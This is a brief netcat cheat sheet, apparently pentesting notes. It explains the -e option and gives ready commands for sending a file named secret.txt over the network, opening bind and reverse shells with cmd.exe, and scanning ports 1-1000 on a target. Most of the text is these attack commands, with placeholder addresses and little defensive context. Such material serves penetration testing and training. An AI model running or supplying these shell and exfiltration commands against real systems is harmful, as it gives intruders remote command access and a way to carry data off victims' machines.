Content #
The DGAPING_SECURITY_HOLE option allows an operator to execute programs using the –e switch to do a number of powerful tasks, including launching a shell.
Transferring data with netcat #
In server:
ncat -v -w 30 -p 31337 -l < secret.txt
-w switch instructs Netcat to wait for a specific number of seconds before timing out the connection. In client:
ncat -v -w 2 x.x.x.x 31337 > secret.txt
Using Netcat to get a remote shell on a target computer #
-
Preparing the listener
ncat -Lp 31337 -vv -e cmd.exe-L switch to maintain a persistent connection with the listener.
-
Connecting to the target
ncat x.x.x.x 31337
It does not matter which side the listener is and which side the client is.
ncat -lp 80 #server
ncat x.x.x.x 80 -e cmd.exe #client
Basic port scanning against a target #
ncat -v -w 1 x.x.x.x -z 1-1000
-z indicates that netcat should operate in zero I/O mode. zero I/O mode speeds up the process of executing the port scan by ignoring any latency baked in by the program to account for delays by the CPU.
Randomized port scanning against a target #
ncat -v -r -w 1 x.x.x.x -z 1-1000